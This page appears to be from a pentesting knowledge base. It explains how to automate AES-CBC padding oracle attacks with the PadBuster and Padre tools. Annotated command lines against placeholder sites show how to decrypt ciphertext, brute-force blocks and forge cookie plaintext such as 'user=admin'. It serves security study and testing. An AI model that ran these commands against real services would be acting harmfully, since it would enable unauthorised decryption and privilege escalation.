AES-CBC Padding Oracle Attack

Automation

PadBuster

PadBuster is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.

# Encrypted Sample -> 2hN2bBPw==
# 16 -> Block site
# -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw==  16 -encoding 0

# -bruteforce: Brute force against the first block
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce

# -cookies: specify cookie value
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw=="

# -plaintext: specify plain text
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin"

Padre

Padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption.

# Cookie
padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD=='

# Path
padre -u 'https://example.com/profile/$' 'ABCD=='

# -e: Specify encode type ('b64' or 'lhex')
padre -u 'https://example.com/profile/$' -e lhex '1234abcd...'

# -err: Error response contents pattern (regex)
padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD=='

PreviousAlgorithim Pentesting NextAES-ECB Padding Attack

Last updated 1 month ago

hashtagAutomation

hashtagPadBuster

hashtagPadre

Automation

PadBuster

Padre